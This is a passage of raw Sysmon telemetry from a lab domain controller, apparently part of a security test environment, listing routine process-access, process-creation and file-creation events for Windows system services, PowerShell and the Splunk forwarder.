Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.743{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.743{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.696{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jq1lcezh.3ce.ps12021-01-14 13:09:47.696 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.681{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429B-6000-5800-000000009A01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5B00-000000009A01}3832C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5B00-000000009A01}3832C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-429A-6000-5100-000000009A01}40202256C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429B-6000-5B00-000000009A01}3832C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.669{08A6967A-429B-6000-5B00-000000009A01}3832C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429B-6000-5A00-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windo